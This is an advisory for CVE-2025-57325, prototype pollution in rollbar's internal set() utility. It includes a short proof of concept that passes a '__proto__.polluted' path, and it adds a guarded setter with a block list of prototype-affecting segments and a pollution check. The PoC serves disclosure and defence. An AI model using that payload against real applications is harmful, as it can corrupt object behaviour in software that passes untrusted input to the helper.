CVE-2025-57325: rollbar vulnerable to prototype pollution
The utility function set() in rollbar/src/utility is potentially vulnerable to prototype pollution. There is no impact when the published public interface is used.
If application code imports set directly from rollbar/src/utility and calls it with untrusted input in the second (path) argument, it is vulnerable to prototype pollution.
POC:
const obj = {};
require("rollbar/src/utility").set(obj, "__proto__.polluted", "vulnerable");
console.log({}.polluted !== undefined ? '[POLLUTION_TRIGGERED]':'');
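The mitigation side of the PoC above, as an added example that is not rollbar's code: a dot-path deep setter that refuses prototype-affecting path segments before writing, and a helper that checks whether Object.prototype has picked up a property. The function names safeSet, isSafePath, isPrototypePolluted and demo are assumptions for this example; the untrusted path string is the one from the PoC, and the benign path is constructed.

```javascript
// Added example, not rollbar's set(): deep-set guarded against prototype pollution.

// Path segments that must never be walked when the path comes from untrusted
// input. Each one lets the walk leave the target object and reach
// Object.prototype (or a constructor's prototype).
const FORBIDDEN_SEGMENTS = new Set(["__proto__", "constructor", "prototype"]);

// Returns true when every segment of a dot-separated path is non-empty and
// not one of the forbidden names.
function isSafePath(path) {
  return path
    .split(".")
    .every((seg) => seg.length > 0 && !FORBIDDEN_SEGMENTS.has(seg));
}

// Sets `value` at the dot-separated `path` inside `obj`, creating plain
// intermediate objects as needed. Throws instead of writing when the path
// contains a forbidden segment, so a pollution attempt fails loudly.
function safeSet(obj, path, value) {
  if (typeof path !== "string" || !isSafePath(path)) {
    throw new TypeError(`refusing to set unsafe path: ${JSON.stringify(path)}`);
  }
  const segments = path.split(".");
  let cur = obj;
  for (let i = 0; i < segments.length - 1; i++) {
    const seg = segments[i];
    // Only descend into own, non-null object properties; an inherited
    // property would let the walk escape `obj`.
    if (
      !Object.prototype.hasOwnProperty.call(cur, seg) ||
      typeof cur[seg] !== "object" ||
      cur[seg] === null
    ) {
      cur[seg] = {};
    }
    cur = cur[seg];
  }
  cur[segments[segments.length - 1]] = value;
  return obj;
}

// Detection check: a successful pollution leaves `name` as an own property
// of Object.prototype, visible on every plain object afterwards.
function isPrototypePolluted(name) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, name);
}

// Runs the PoC's untrusted path through the guarded setter, then a benign
// nested write (constructed) to show normal use still works.
function demo() {
  const obj = {};
  let blocked = false;
  try {
    safeSet(obj, "__proto__.polluted", "vulnerable"); // path from the PoC
  } catch (e) {
    blocked = e instanceof TypeError;
  }
  safeSet(obj, "user.profile.name", "alice"); // constructed benign path
  return { blocked, polluted: isPrototypePolluted("polluted"), obj };
}
```

With the unguarded set() from the PoC, `{}.polluted` becomes defined after the call; with safeSet the call throws and isPrototypePolluted("polluted") stays false. Denying the three segment names is the minimum; an allow-list of expected top-level keys is stricter when the schema is known.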
References
- github.com/VulnSageAgent/PoCs/blob/main/JavaScript/prototype-pollution/rollbar%402.26.4/index.js
- github.com/VulnSageAgent/PoCs/tree/main/JavaScript/prototype-pollution/CVE-2025-57325
- github.com/advisories/GHSA-r8c2-2qwq-94p6
- github.com/rollbar/rollbar.js
- github.com/rollbar/rollbar.js/commit/d717def8b68f4a947975d0aebb729869cdb2d343
- github.com/rollbar/rollbar.js/issues/1333
- github.com/rollbar/rollbar.js/security/advisories/GHSA-r8c2-2qwq-94p6
- nvd.nist.gov/vuln/detail/CVE-2025-57325